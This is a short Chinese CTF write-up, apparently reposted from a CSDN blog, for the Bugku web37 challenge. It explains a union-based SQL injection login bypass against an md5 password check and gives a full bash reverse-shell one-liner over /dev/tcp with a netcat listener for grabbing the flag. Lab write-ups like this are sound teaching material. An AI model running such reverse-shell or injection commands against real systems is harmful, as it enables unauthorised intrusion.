Bugku CTF web37(Web)

0、打开网页,查看提示

提  示: hint:union,命令执行

1、使用BurpSuite抓包,用重发器发送

2、base64解码tip内容

$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){}

这告诉我们要登录要满足两个条件:首先,查询结果不为空;其次,输入的password的值要等于md5(password)。

3、使用联合查询语句登录

4、构造payload,获取flag

看了一些wp,有的是用py脚本进行爆破,命令执行的结果太乱了,看不出什么门道,最后还是采用的反弹shell来做的。

反弹shell需要有公网ip,我们假设有个公网ip192.168.10.130,不用公网ip的话就线下赛局域网做题也行。

输入bash -i >& /dev/tcp/192.168.10.130/8888 0>&1并执行,然后在kali上运行命令:nc -lvp 8888,就能进行连接了,找到flag文件就拿到flag了。
 

猜你喜欢

转载自blog.csdn.net/ChaoYue_miku/article/details/115037157
今日推荐